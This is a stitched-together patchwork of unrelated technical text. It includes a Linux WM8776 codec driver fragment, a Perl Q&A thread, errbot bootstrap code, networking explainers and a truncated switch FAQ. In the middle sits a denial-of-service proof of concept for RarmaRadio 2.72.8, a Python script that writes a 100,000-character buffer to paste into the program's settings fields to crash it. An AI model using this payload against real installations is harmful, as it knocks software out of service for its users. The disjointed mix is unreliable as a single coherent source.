203 case SND_SOC_DAIFMT_LEFT_J:
204 iface |= 0x0001;
205 break;
206 default:
207 return -EINVAL;
208 }
209
210 switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
211 case SND_SOC_DAIFMT_NB_NF:
212 break;
213 case SND_SOC_DAIFMT_IB_IF:
214 iface |= 0x00c;
215 break;
216 case SND_SOC_DAIFMT_IB_NF:
217 iface |= 0x008;
218 break;
219 case SND_SOC_DAIFMT_NB_IF:
220 iface |= 0x004;
221 break;
222 default:
223 return -EINVAL;
224 }
225
226 /* Finally, write out the values */
227 snd_soc_update_bits(codec, reg, 0xf, iface);
228 snd_soc_update_bits(codec, WM8776_MSTRCTRL, 0x180, master);
229
230 return 0;
231 }
232
233 static int mclk_ratios[] = {
234 128,
235 192,
236 256,
237 384,
238 512,
239 768,
240 };
241
242 static int wm8776_hw_params(struct snd_pcm_substream *substream,
243 struct snd_pcm_hw_params *params,
244 struct snd_soc_dai *dai)
245 {
246 struct snd_soc_codec *codec = dai->codec;
247 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
248 int iface_reg, iface;
249 int ratio_shift, master;
250 int i;
251
252 switch (dai->driver->id) {
253 case WM8776_DAI_DAC:
254 iface_reg = WM8776_DACIFCTRL;
255 master = 0x80;
256 ratio_shift = 4;
257 break;
258 case WM8776_DAI_ADC:
259 iface_reg = WM8776_ADCIFCTRL;
260 master = 0x100;
261 ratio_shift = 0;
262 break;
263 default:
264 return -EINVAL;
265 }
266
267 /* Set word length */
268 switch (params_width(params)) {
269 case 16:
270 iface = 0;
271 break;
272 case 20:
273 iface = 0x10;
274 break;
275 case 24:
276 iface = 0x20;
277 break;
278 case 32:
279 iface = 0x30;
280 break;
281 default:
282 dev_err(codec->dev, "Unsupported sample size: %i\n",
283 params_width(params));
284 return -EINVAL;
285 }
286
287 /* Only need to set MCLK/LRCLK ratio if we're master */
288 if (snd_soc_read(codec, WM8776_MSTRCTRL) & master) {
289 for (i = 0; i < ARRAY_SIZE(mclk_ratios); i++) {
290 if (wm8776->sysclk[dai->driver->id] / params_rate(params)
291 == mclk_ratios[i])
292 break;
293 }
294
295 if (i == ARRAY_SIZE(mclk_ratios)) {
296 dev_err(codec->dev,
297 "Unable to configure MCLK ratio %d/%d\n",
298 wm8776->sysclk[dai->driver->id], params_rate(params));
299 return -EINVAL;
300 }
301
302 dev_dbg(codec->dev, "MCLK is %dfs\n", mclk_ratios[i]);
303
304 snd_soc_update_bits(codec, WM8776_MSTRCTRL,
305 0x7 << ratio_shift, i << ratio_shift);
306 } else {
307 dev_dbg(codec->dev, "DAI in slave mode\n");
308 }
309
310 snd_soc_update_bits(codec, iface_reg, 0x30, iface);
311
312 return 0;
313 }
314
315 static int wm8776_mute(struct snd_soc_dai *dai, int mute)
316 {
317 struct snd_soc_codec *codec = dai->codec;
318
319 return snd_soc_write(codec, WM8776_DACMUTE, !!mute);
320 }
321
322 static int wm8776_set_sysclk(struct snd_soc_dai *dai,
323 int clk_id, unsigned int freq, int dir)
324 {
325 struct snd_soc_codec *codec = dai->codec;
326 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
327
328 if (WARN_ON(dai->driver->id >= ARRAY_SIZE(wm8776->sysclk)))
329 return -EINVAL;
330
331 wm8776->sysclk[dai->driver->id] = freq;
332
333 return 0;
334 }
335
336 static int wm8776_set_bias_level(struct snd_soc_codec *codec,
337 enum snd_soc_bias_level level)
338 {
339 struct wm8776_priv *wm8776 = snd_soc_codec_get_drvdata(codec);
340
341 switch (level) {
342 case SND_SOC_BIAS_ON:
343 break;
344 case SND_SOC_BIAS_PREPARE:
345 break;
346 case SND_SOC_BIAS_STANDBY:
347 if (snd_soc_codec_get_bias_level(codec) == SND_SOC_BIAS_OFF) {
348 regcache_sync(wm8776->regmap);
349
            /* Disable the global powerdown; DAPM does the rest */
            snd_soc_update_bits(codec, WM8776_PWRDOWN, 1, 0);
        }

        break;
    case SND_SOC_BIAS_OFF:
        snd_soc_update_bits(codec, WM8776_PWRDOWN, 1, 1);
        break;
    }

    return 0;
}

#define WM8776_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S20_3LE |\
                        SNDRV_PCM_FMTBIT_S24_LE | SNDRV_PCM_FMTBIT_S32_LE)

static const struct snd_soc_dai_ops wm8776_dac_ops = {
    .digital_mute = wm8776_mute,
    .hw_params = wm8776_hw_params,
    .set_fmt = wm8776_set_fmt,
    .set_sysclk = wm8776_set_sysclk,
};

static const struct snd_soc_dai_ops wm8776_adc_ops = {
    .hw_params = wm8776_hw_params,
    .set_fmt = wm8776_set_fmt,
    .set_sysclk = wm8776_set_sysclk,
};

static struct snd_soc_dai_driver wm8776_dai[] = {
    {
        .name = "wm8776-hifi-playback",
        .id = WM8776_DAI_DAC,
        .playback = {
            .stream_name = "Playback",
            .channels_min = 2,
            .channels_max = 2,
            .rates = SNDRV_PCM_RATE_CONTINUOUS,
            .rate_min = 32000,
            .rate_max = 192000,
            .formats = WM8776_FORMATS,
        },
        .ops = &wm8776_dac_ops,
    },
    {
        .name = "wm8776-hifi-capture",
        .id = WM8776_DAI_ADC,
        .capture = {
            .stream_name = "Capture",
            .channels_min = 2,
            .channels_max = 2,
            .rates = SNDRV_PCM_RATE_CONTINUOUS,
            .rate_min = 32000,
            .rate_max = 96000,
            .formats = WM8776_FORMATS,
        },
        .ops = &wm8776_adc_ops,
    },
};

static int wm8776_probe(struct snd_soc_codec *codec)
{
    int ret = 0;

    ret = wm8776_reset(codec);
    if (ret < 0) {
        dev_err(codec->dev, "Failed to issue reset: %d\n", ret);
        return ret;
    }

    /* Latch the update bits; right channel only since we always
     * update both. */
    snd_soc_update_bits(codec, WM8776_HPRVOL, 0x100, 0x100);
    snd_soc_update_bits(codec, WM8776_DACRVOL, 0x100, 0x100);

    return ret;
}

static struct snd_soc_codec_driver soc_codec_dev_wm8776 = {
    .probe = wm8776_probe,
    .set_bias_level = wm8776_set_bias_level,
    .suspend_bias_off = true,

    .controls = wm8776_snd_controls,
    .num_controls = ARRAY_SIZE(wm8776_snd_controls),
    .dapm_widgets = wm8776_dapm_widgets,
    .num_dapm_widgets = ARRAY_SIZE(wm8776_dapm_widgets),
    .dapm_routes = routes,
    .num_dapm_routes = ARRAY_SIZE(routes),
};

static const struct of_device_id wm8776_of_match[] = {
    { .compatible = "wlf,wm8776", },
    { }
};
MODULE_DEVICE_TABLE(of, wm8776_of_match);

static const struct regmap_config wm8776_regmap = {
    .reg_bits = 7,
    .val_bits = 9,
    .max_register = WM8776_RESET,

    .reg_defaults = wm8776_reg_defaults,
    .num_reg_defaults = ARRAY_SIZE(wm8776_reg_defaults),
    .cache_type = REGCACHE_RBTREE,

    .volatile_reg = wm8776_volatile,
};

#if defined(CONFIG_SPI_MASTER)
static int wm8776_spi_probe(struct spi_device *spi)
{
    struct wm8776_priv *wm8776;
    int ret;

    wm8776 = devm_kzalloc(&spi->dev, sizeof(struct wm8776_priv),
                          GFP_KERNEL);
    if (wm8776 == NULL)
        return -ENOMEM;

    wm8776->regmap = devm_regmap_init_spi(spi, &wm8776_regmap);
    if (IS_ERR(wm8776->regmap))
        return PTR_ERR(wm8776->regmap);

    spi_set_drvdata(spi, wm8776);

    ret = snd_soc_register_codec(&spi->dev,
            &soc_codec_dev_wm8776, wm8776_dai, ARRAY_SIZE(wm8776_dai));

    return ret;
}

static int wm8776_spi_remove(struct spi_device *spi)
{
    snd_soc_unregister_codec(&spi->dev);
    return 0;
}

static struct spi_driver wm8776_spi_driver = {
    .driver = {
        .name = "wm8776",
        .of_match_table = wm8776_of_match,
    },
    .probe = wm8776_spi_probe,
    .remove = wm8776_spi_remove,
};
#endif /* CONFIG_SPI_MASTER */

#if IS_ENABLED(CONFIG_I2C)
static int wm8776_i2c_probe(struct i2c_client *i2c,
                            const struct i2c_device_id *id)
{
    struct wm8776_priv *wm8776;
    int ret;

    wm8776 = devm_kzalloc(&i2c->dev, sizeof(struct wm8776_priv),
                          GFP_KERNEL);
    if (wm8776 == NULL)
        return -ENOMEM;

    wm8776->regmap = devm_regmap_init_i2c(i2c, &wm8776_regmap);
    if (IS_ERR(wm8776->regmap))
        return PTR_ERR(wm8776->regmap);

    i2c_set_clientdata(i2c, wm8776);

    ret = snd_soc_register_codec(&i2c->dev,
            &soc_codec_dev_wm8776, wm8776_dai, ARRAY_SIZE(wm8776_dai));

    return ret;
}

static int wm8776_i2c_remove(struct i2c_client *client)
{
    snd_soc_unregister_codec(&client->dev);
    return 0;
}

static const struct i2c_device_id wm8776_i2c_id[] = {
    { "wm8775", WM8775 },
    { "wm8776", WM8776 },
    { }
};
MODULE_DEVICE_TABLE(i2c, wm8776_i2c_id);

static struct i2c_driver wm8776_i2c_driver = {
    .driver = {
        .name = "wm8776",
        .of_match_table = wm8776_of_match,
    },
    .probe = wm8776_i2c_probe,
    .remove = wm8776_i2c_remove,
    .id_table = wm8776_i2c_id,
};
#endif

static int __init wm8776_modinit(void)
{
    int ret = 0;
#if IS_ENABLED(CONFIG_I2C)
    ret = i2c_add_driver(&wm8776_i2c_driver);
    if (ret != 0) {
        printk(KERN_ERR "Failed to register wm8776 I2C driver: %d\n",
               ret);
    }
#endif
#if defined(CONFIG_SPI_MASTER)
    ret = spi_register_driver(&wm8776_spi_driver);
    if (ret != 0) {
        printk(KERN_ERR "Failed to register wm8776 SPI driver: %d\n",
               ret);
    }
#endif
    return ret;
}
module_init(wm8776_modinit);

static void __exit wm8776_exit(void)
{
#if IS_ENABLED(CONFIG_I2C)
    i2c_del_driver(&wm8776_i2c_driver);
#endif
#if defined(CONFIG_SPI_MASTER)
    spi_unregister_driver(&wm8776_spi_driver);
#endif
}
module_exit(wm8776_exit);

MODULE_DESCRIPTION("ASoC WM8776 driver");
MODULE_AUTHOR("Mark Brown <[email protected]>");
MODULE_LICENSE("GPL");
## https://sploitus.com/exploit?id=PACKETSTORM:162766
# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64
#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script; it will create a new .txt file
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)
# Build a 100000-character payload file to paste into the vulnerable fields
buffer = 'Ñ' * 100000
try:
    with open("Lambda.txt", "w") as file:
        file.write(buffer)
    print("File ready")
except OSError:
    print("File not ready")
What is "d2dpmcommunicator.dll"?
Our database contains 8 different files for the name d2dpmcommunicator.dll. You can also check the most distributed file variants with the name d2dpmcommunicator.dll. These files most frequently belong to the product CA ARCserve D2D and were most frequently developed by the company CA. They most frequently carry the description CA ARCserve D2D. This file is a Dynamic Link Library, which can be loaded and executed in any running process.
d2dpmcommunicator.dll Library
Details of the most used files with the name "d2dpmcommunicator.dll"
Product:
CA ARCserve D2D
Company:
CA
Description:
CA ARCserve D2D
Version:
16.0.1174.3
MD5:
8348372172aaa1f20feca246e3ca152d
SHA1:
e9a93f4a87697549cb45abdceb1e6fa0abcfe5a2
SHA256:
b10d70806d4ff81625b5e6159495a90b022c5ee92204eb0a0e6c8496610d04db
Size:
19784
Directory:
%PROGFILES64%\CA\ARCserve D2D\Update Manager
Operating System:
Windows 7
Occurrence:
Low
Digital signature:
CA
Is the "d2dpmcommunicator.dll" library Safe or a Threat?
The latest new variant of the file named "d2dpmcommunicator.dll" was discovered 2314 days ago. Our database contains 1 variant of the file "d2dpmcommunicator.dll" with a final rating of Safe and zero variants with a final rating of Threat. Final ratings are based on reviews, discovery date, user occurrence, and antivirus results.
Scan: A library with the file name "d2dpmcommunicator.dll" can be Safe or a Threat. You must define more file attributes to determine the correct rating. Our award-winning free tool provides the simplest way to check your files against our database. The tool contains many useful functions to keep your system under control and uses a minimum of system resources.
Click here to download System Explorer for free.
Reviews for "d2dpmcommunicator.dll"
We do not yet have user reviews for files with the name "d2dpmcommunicator.dll".
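The table above lists MD5, SHA1, and SHA256 digests for the most common variant. As an illustration (not part of the original page), one way to compute the same three digests for a local copy of a file in Python is:

```python
import hashlib

def file_hashes(path, chunk_size=1 << 20):
    """Compute MD5, SHA1 and SHA256 of a file in a single streaming pass."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, 'rb') as f:
        # Read in chunks so large DLLs don't have to fit in memory at once
        for chunk in iter(lambda: f.read(chunk_size), b''):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()
```

Comparing the returned hex digests against the values listed above tells you whether your copy matches the cataloged variant.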
Ethernet Private Line (EPL) is a dedicated, point-to-point Ethernet service that provides a high-speed and secure connection between two specific locations. EPL is often used by businesses and organizations to establish a private and reliable network link between two geographically separate sites. It offers several key features and benefits that make it a popular choice for point-to-point connectivity.
Key Features of Ethernet Private Line (EPL):
1. Dedicated Connection: EPL provides a dedicated and exclusive Ethernet connection between the two endpoints, ensuring that bandwidth is not shared with other users or applications.
2. Guaranteed Bandwidth: EPL services offer guaranteed and symmetrical bandwidth, meaning that the same amount of bandwidth is available for both upstream and downstream traffic. This predictability is crucial for applications that require consistent performance.
3. Low Latency: EPL connections typically have low latency, making them suitable for real-time applications such as voice and video conferencing, as well as data replication and backup.
4. High Reliability: EPL services are known for their reliability and uptime, making them ideal for mission-critical applications and data transfer between key locations.
5. Scalability: EPL services can often be easily scaled to accommodate changing bandwidth requirements, allowing businesses to adapt to evolving network needs.
6. Secure Communication: EPL connections are inherently secure, as the data transmitted over the dedicated link is not exposed to external traffic or potential eavesdropping.
7. Simple Management: EPL services are typically straightforward to manage, with easy configuration and monitoring options for network administrators.
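To make the "guaranteed, symmetrical bandwidth" point concrete, here is a small illustrative calculation; the 500 GB backup size and 1 Gbps line rate are assumptions for the example, not figures from the text:

```python
# Rough transfer-time estimate over a dedicated, symmetrical EPL link.
# Because EPL bandwidth is dedicated and guaranteed, the full line rate
# can be assumed for planning purposes.

def transfer_time_seconds(data_gigabytes, link_gbps):
    bits = data_gigabytes * 8 * 10**9   # decimal GB -> bits
    return bits / (link_gbps * 10**9)   # link rate in bits per second

hours = transfer_time_seconds(500, 1.0) / 3600
print(round(hours, 2))  # 1.11 — about 67 minutes at full line rate
```

On a shared or best-effort link the same estimate would only be an upper bound; on EPL it is a usable planning figure, which is why the service suits scheduled replication and backup windows.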
Use Cases for Ethernet Private Line (EPL):
1. Connecting Offices: EPL is commonly used to connect multiple office locations, ensuring fast and secure data transfer between headquarters, branch offices, or remote sites.
2. Data Center Connectivity: Businesses often deploy EPL to connect their data centers, enabling efficient data replication, backup, and disaster recovery processes.
3. Voice and Video Conferencing: EPL’s low latency and guaranteed bandwidth make it an excellent choice for supporting real-time communication applications, such as voice and video conferencing.
4. High-Speed Internet Access: Some businesses utilize EPL to establish high-speed, dedicated internet access, ensuring a consistent and reliable internet connection.
5. Private Cloud Connectivity: EPL can be used to connect to private cloud environments, facilitating secure access to cloud resources.
6. Content Distribution: Media and content providers may use EPL to distribute large volumes of data or media content between production facilities, content delivery centers, and distribution points.
7. Financial Services: Financial institutions often rely on EPL for secure and low-latency connectivity between their trading desks, data centers, and financial exchanges.
In summary, Ethernet Private Line (EPL) is a dedicated and symmetrical Ethernet service that provides a secure, reliable, and high-speed point-to-point connection between two locations. It is well-suited for businesses and organizations that require a private and predictable network link for various applications, including data transfer, real-time communication, and internet access. EPL’s guaranteed bandwidth, low latency, and high reliability make it an essential solution for supporting critical network connectivity needs.
How would I convert a string holding a number into its numeric value in Perl?
Some of the answers are confusing because the question has been edited. The answer by porquero is best for this version of the question. – TimK Dec 7 '15 at 16:19
The question needs further detail. Is the string only composed of numerals? Alphanumeric? Ok if alphas are stripped? Is there a specific purpose for the resulting number? – JGurtz Mar 1 at 22:51
You don't need to convert it at all:
% perl -e 'print "5.45" + 0.1;'
5.55
share|improve this answer
10
5.55 isn't an integer – OrangeDog Mar 7 '12 at 14:00
10
@OrangeDog the OP edited the question (some months after this answer was posted) - the original question actually had floating point numbers in it. – Alnitak Mar 14 '12 at 10:46
what about comparisons when the string has a comma in it? – Ramy May 22 '14 at 15:21
[rabdelaz@Linux_Desktop:~/workspace/akatest_5]$perl -e 'print "nope\n" unless "1,000" > 10;' nope [rabdelaz@Linux_Desktop:~/workspace/akatest_5]$perl -e 'print "nope\n" if "1,000" > 10;' – Ramy May 22 '14 at 15:24
This is a simple solution:
Example 1
my $var1 = "123abc";
print $var1 + 0;
Result
123
Example 2
my $var2 = "abc123";
print $var2 + 0;
Result
0
share|improve this answer
3
AFAIU this is the only answer to what was asked – Cougar May 10 '13 at 14:17
@Cougar: I agree. – Peter Mortensen May 7 '15 at 10:30
Perl is a context-based language. It doesn't do its work according to the data you give it. Instead, it figures out how to treat the data based on the operators you use and the context in which you use them. If you do numbers sorts of things, you get numbers:
# numeric addition with strings:
my $sum = '5.45' + '0.01'; # 5.46
If you do strings sorts of things, you get strings:
# string replication with numbers:
my $string = ( 45/2 ) x 4; # "22.522.522.522.5"
Perl mostly figures out what to do and it's mostly right. Another way of saying the same thing is that Perl cares more about the verbs than it does the nouns.
Are you trying to do something and it isn't working?
share|improve this answer
Forgive my lack of knowledge here but I don't quite get your second example. You're dividing two numbers, then multiplying them, how/why does this result in a string? – gideon Nov 28 '12 at 14:35
4
I'm not multiplying numbers. The x is the string replication operator. – brian d foy Jan 7 '13 at 9:12
1
oh I see. thanks! :) Perl sure has a lot of operators. – gideon Jan 7 '13 at 10:26
2
Shouldn't it be my $string = ( 45/2 ) x 3; # "22.522.522.5" with 45 instead of 44? Otherwise I don't get where the '.5's come from in the result... – Vickster Feb 27 '13 at 13:42
Google led me here while searching on the same question phill asked (sorting floats) so I figured it would be worth posting the answer despite the thread being kind of old. I'm new to perl and am still getting my head wrapped around it but brian d foy's statement "Perl cares more about the verbs than it does the nouns." above really hits the nail on the head. You don't need to convert the strings to floats before applying the sort. You need to tell the sort to sort the values as numbers and not strings. i.e.
my @foo = ('1.2', '3.4', '2.1', '4.6');
my @foo_sort = sort {$a <=> $b} @foo;
See http://perldoc.perl.org/functions/sort.html for more details on sort
$var += 0
is probably what you want. Be warned, however: if $var is a string that cannot be converted to a number, you'll get an error and $var will be reset to 0:
my $var = 'abc123';
print "var = $var\n";
$var += 0;
print "var = $var\n";
logs
var = abc123
Argument "abc123" isn't numeric in addition (+) at test.pl line 7.
var = 0
share|improve this answer
As I understand it, int() is not intended as a 'cast' function for designating data type; it's simply being (ab)used here to define the context as an arithmetic one. I've (ab)used (0+$val) in the past to ensure that $val is treated as a number.
Perl really only has three types: scalars, arrays, and hashes. And even that distinction is arguable. ;) The way each variable is treated depends on what you do with it:
% perl -e "print 5.4 . 3.4;"
5.43.4
% perl -e "print '5.4' + '3.4';"
8.8
Perl has many more types than, but for single values, it's just a single value. – brian d foy Nov 14 '08 at 3:02
you can also add 0 – Nathan Fellman Mar 31 '09 at 19:04
In comparisons it makes a difference whether a scalar is a number or a string. And it is not always decidable. I can report a case where perl retrieved a float in "scientific" notation and used that same value a few lines below in a comparison:
use strict;
....
next unless $line =~ /and your result is:\s*(.*)/;
my $val = $1;
if ($val < 0.001) {
print "this is small\n";
}
And here $val was not interpreted as numeric for e.g. "2e-77" retrieved from $line. Adding 0 (or 0.0 for good ole C programmers) helped.
Perl is weakly typed and context based. Many scalars can be treated both as strings and numbers, depending on the operators you use.

$a = 7*6; $b = 7x6; print "$a $b\n";
You get 42 777777.
There is a subtle difference, however. When you read numeric data from a text file into a data structure, and then view it with Data::Dumper, you'll notice that your numbers are quoted. Perl treats them internally as strings.
Read: $my_hash{$1} = $2 if /(.+)=(.+)\n/;
Dump: 'foo' => '42'
If you want unquoted numbers in the dump:
Read: $my_hash{$1} = $2+0 if /(.+)=(.+)\n/;
Dump: 'foo' => 42
After $2+0 Perl notices that you've treated $2 as a number, because you used a numeric operator.
I noticed this whilst trying to compare two hashes with Data::Dumper.
Description
Session ID: 1613
Abstract:
With the release of the Oracle Mobile Cloud, Enterprise (OMCe) platform, customers now have the ability to enhance the user experience and provide connected relevant content instantly. Through modern mobile applications that are easier to create, and intelligent chatbots that provide a conversational interface, employees can escape the daily drag of navigating through a poor interface to try and find relevant content. Come to this session to hear more about how deploying a connected chatbot army can help your users get to the information they need to do their jobs effectively - across applications and business processes. This session will highlight a chatbot called Atlas, which is running on OMCe and provides a mechanism to connect to third party chatbots on other infrastructures and cloud platforms. This all brings together a much richer conversational journey for users across those platforms. Additionally come hear about the importance of a connected bot army with bots providing connected personalised information from Oracle Engagement Cloud, PeopleSoft HCM, Taleo and Content and Experience Cloud in a dynamic conversational flow.
Objective 1: 1. Understanding Interface vs Conversational flow User Experiences.
2. What are Chatbots, and how and where they can help an organisation.
3. Learn what types of bots are already in the market and how organisations are using them.
Objective 2: 1. A technical overview of chatbots, natural language processing, and artificial intelligence.
2. Steps to creating a good conversational flow.
3. How to integrate a chatbot and enhance its ability to personalise content with machine learning us
Objective 3: 1. Understand why you should create a bot army and not a single bot integrated to all required platforms and services?
2. Demo of Oracle Software Cloud exposed as a conversational flow.
3. Benefits of connecting to third-party chatbots.
Audience: Introductory
Source code for errbot.bootstrap
from os import path, makedirs
import logging
import sys
import ast
from errbot.core import ErrBot
from errbot.plugin_manager import BotPluginManager
from errbot.repo_manager import BotRepoManager
from errbot.specific_plugin_manager import SpecificPluginManager
from errbot.storage.base import StoragePluginBase
from errbot.utils import PLUGINS_SUBDIR
from errbot.logs import format_logs
log = logging.getLogger(__name__)
HERE = path.dirname(path.abspath(__file__))
CORE_BACKENDS = path.join(HERE, 'backends')
CORE_STORAGE = path.join(HERE, 'storage')
PLUGIN_DEFAULT_INDEX = 'https://repos.errbot.io/repos.json'
def bot_config_defaults(config):
    if not hasattr(config, 'ACCESS_CONTROLS_DEFAULT'):
        config.ACCESS_CONTROLS_DEFAULT = {}
    if not hasattr(config, 'ACCESS_CONTROLS'):
        config.ACCESS_CONTROLS = {}
    if not hasattr(config, 'HIDE_RESTRICTED_COMMANDS'):
        config.HIDE_RESTRICTED_COMMANDS = False
    if not hasattr(config, 'HIDE_RESTRICTED_ACCESS'):
        config.HIDE_RESTRICTED_ACCESS = False
    if not hasattr(config, 'BOT_PREFIX_OPTIONAL_ON_CHAT'):
        config.BOT_PREFIX_OPTIONAL_ON_CHAT = False
    if not hasattr(config, 'BOT_PREFIX'):
        config.BOT_PREFIX = '!'
    if not hasattr(config, 'BOT_ALT_PREFIXES'):
        config.BOT_ALT_PREFIXES = ()
    if not hasattr(config, 'BOT_ALT_PREFIX_SEPARATORS'):
        config.BOT_ALT_PREFIX_SEPARATORS = ()
    if not hasattr(config, 'BOT_ALT_PREFIX_CASEINSENSITIVE'):
        config.BOT_ALT_PREFIX_CASEINSENSITIVE = False
    if not hasattr(config, 'DIVERT_TO_PRIVATE'):
        config.DIVERT_TO_PRIVATE = ()
    if not hasattr(config, 'DIVERT_TO_THREAD'):
        config.DIVERT_TO_THREAD = ()
    if not hasattr(config, 'MESSAGE_SIZE_LIMIT'):
        config.MESSAGE_SIZE_LIMIT = 10000  # Corresponds with what HipChat accepts
    if not hasattr(config, 'GROUPCHAT_NICK_PREFIXED'):
        config.GROUPCHAT_NICK_PREFIXED = False
    if not hasattr(config, 'AUTOINSTALL_DEPS'):
        config.AUTOINSTALL_DEPS = True
    if not hasattr(config, 'SUPPRESS_CMD_NOT_FOUND'):
        config.SUPPRESS_CMD_NOT_FOUND = False
    if not hasattr(config, 'BOT_ASYNC'):
        config.BOT_ASYNC = True
    if not hasattr(config, 'BOT_ASYNC_POOLSIZE'):
        config.BOT_ASYNC_POOLSIZE = 10
    if not hasattr(config, 'CHATROOM_PRESENCE'):
        config.CHATROOM_PRESENCE = ()
    if not hasattr(config, 'CHATROOM_RELAY'):
        config.CHATROOM_RELAY = ()
    if not hasattr(config, 'REVERSE_CHATROOM_RELAY'):
        config.REVERSE_CHATROOM_RELAY = ()
    if not hasattr(config, 'CHATROOM_FN'):
        config.CHATROOM_FN = 'Errbot'
    if not hasattr(config, 'TEXT_DEMO_MODE'):
        config.TEXT_DEMO_MODE = True
    if not hasattr(config, 'BOT_ADMINS'):
        raise ValueError('BOT_ADMINS missing from config.py.')
    if not hasattr(config, 'TEXT_COLOR_THEME'):
        config.TEXT_COLOR_THEME = 'light'
    if not hasattr(config, 'BOT_ADMINS_NOTIFICATIONS'):
        config.BOT_ADMINS_NOTIFICATIONS = config.BOT_ADMINS

def setup_bot(backend_name, logger, config, restore=None):
    # from here the environment is supposed to be set (daemon / non daemon,
    # config.py in the python path )
    bot_config_defaults(config)

    format_logs(config.TEXT_COLOR_THEME)

    if config.BOT_LOG_FILE:
        hdlr = logging.FileHandler(config.BOT_LOG_FILE)
        hdlr.setFormatter(logging.Formatter("%(asctime)s %(levelname)-8s %(name)-25s %(message)s"))
        logger.addHandler(hdlr)

    if hasattr(config, 'BOT_LOG_SENTRY') and config.BOT_LOG_SENTRY:
        try:
            from raven.handlers.logging import SentryHandler
        except ImportError:
            log.exception(
                "You have BOT_LOG_SENTRY enabled, but I couldn't import modules "
                "needed for Sentry integration. Did you install raven? "
                "(See http://raven.readthedocs.org/en/latest/install/index.html "
                "for installation instructions)"
            )
            exit(-1)

        sentryhandler = SentryHandler(config.SENTRY_DSN, level=config.SENTRY_LOGLEVEL)
        logger.addHandler(sentryhandler)

    logger.setLevel(config.BOT_LOG_LEVEL)

    storage_plugin = get_storage_plugin(config)

    # init the botplugin manager
    botplugins_dir = path.join(config.BOT_DATA_DIR, PLUGINS_SUBDIR)
    if not path.exists(botplugins_dir):
        makedirs(botplugins_dir, mode=0o755)

    plugin_indexes = getattr(config, 'BOT_PLUGIN_INDEXES', (PLUGIN_DEFAULT_INDEX,))
    if isinstance(plugin_indexes, str):
        plugin_indexes = (plugin_indexes, )

    repo_manager = BotRepoManager(storage_plugin,
                                  botplugins_dir,
                                  plugin_indexes)

    botpm = BotPluginManager(storage_plugin,
                             repo_manager,
                             config.BOT_EXTRA_PLUGIN_DIR,
                             config.AUTOINSTALL_DEPS,
                             getattr(config, 'CORE_PLUGINS', None),
                             getattr(config, 'PLUGINS_CALLBACK_ORDER', (None, )))

    # init the backend manager & the bot
    backendpm = bpm_from_config(config)

    backend_plug = backendpm.get_candidate(backend_name)

    log.info("Found Backend plugin: '%s'\n\t\t\t\t\t\tDescription: %s" %
             (backend_plug.name, backend_plug.description))

    try:
        bot = backendpm.get_plugin_by_name(backend_name)
        bot.attach_storage_plugin(storage_plugin)
        bot.attach_repo_manager(repo_manager)
        bot.attach_plugin_manager(botpm)
        bot.initialize_backend_storage()
    except Exception:
        log.exception("Unable to load or configure the backend.")
        exit(-1)

    # restore the bot from the restore script
    if restore:
        # Prepare the context for the restore script
        if 'repos' in bot:
            log.fatal('You cannot restore onto a non empty bot.')
            sys.exit(-1)
        log.info('**** RESTORING the bot from %s' % restore)
        with open(restore) as f:
            ast.literal_eval(f.read())
        bot.close_storage()
        print('Restore complete. You can restart the bot normally')
        sys.exit(0)

    errors = bot.plugin_manager.update_dynamic_plugins()
    if errors:
        log.error('Some plugins failed to load:\n' + '\n'.join(errors.values()))
        bot._plugin_errors_during_startup = "\n".join(errors.values())
    return bot

def get_storage_plugin(config):
    """
    Find and load the storage plugin
    :param config: the bot configuration.
    :return: the storage plugin
    """
    storage_name = getattr(config, 'STORAGE', 'Shelf')
    extra_storage_plugins_dir = getattr(config, 'BOT_EXTRA_STORAGE_PLUGINS_DIR', None)
    spm = SpecificPluginManager(config, 'storage', StoragePluginBase, CORE_STORAGE, extra_storage_plugins_dir)
    storage_pluginfo = spm.get_candidate(storage_name)
    log.info("Found Storage plugin: '%s'\nDescription: %s" %
             (storage_pluginfo.name, storage_pluginfo.description))
    storage_plugin = spm.get_plugin_by_name(storage_name)
    return storage_plugin

def bpm_from_config(config):
    """Creates a backend plugin manager from a given config."""
    extra = getattr(config, 'BOT_EXTRA_BACKEND_DIR', [])
    return SpecificPluginManager(
        config,
        'backends',
        ErrBot,
        CORE_BACKENDS,
        extra_search_dirs=extra
    )

def enumerate_backends(config):
    """ Returns all the backends found for the given config. """
    bpm = bpm_from_config(config)
    return [plug.name for (_, _, plug) in bpm.getPluginCandidates()]

def bootstrap(bot_class, logger, config, restore=None):
    """
    Main starting point of Errbot.

    :param bot_class: The backend class inheriting from Errbot you want to start.
    :param logger: The logger you want to use.
    :param config: The config.py module.
    :param restore: Start Errbot in restore mode (from a backup).
    """
    bot = setup_bot(bot_class, logger, config, restore)
    log.debug('Start serving commands from the %s backend' % bot.mode)
    bot.serve_forever()
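The hasattr/default pattern that bot_config_defaults applies to every setting can be shown in isolation; the minimal config object below is a hypothetical stand-in for the user's config.py module:

```python
import types

# A minimal stand-in for a user's config.py module (hypothetical values).
config = types.SimpleNamespace(BOT_ADMINS=('@admin',))

# Fill in an attribute only when the user's config didn't set it,
# exactly as bot_config_defaults does for each setting.
if not hasattr(config, 'BOT_PREFIX'):
    config.BOT_PREFIX = '!'

print(config.BOT_PREFIX)  # prints: !
```

Because the defaults are applied to the module object itself, every later consumer of the config sees a fully populated namespace without the user having to spell out each setting.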
Whether hosts can communicate when an S series switch acts as the gateway and the subnet masks of the downlink hosts are longer (larger) than the switch's
When an S series switch (except the S1700) acts as the gateway and the subnet masks of the downlink hosts are longer (larger) than the switch's subnet mask, communication between the hosts works as follows:
1) Hosts on the same network segment and in the same VLAN can communicate normally.
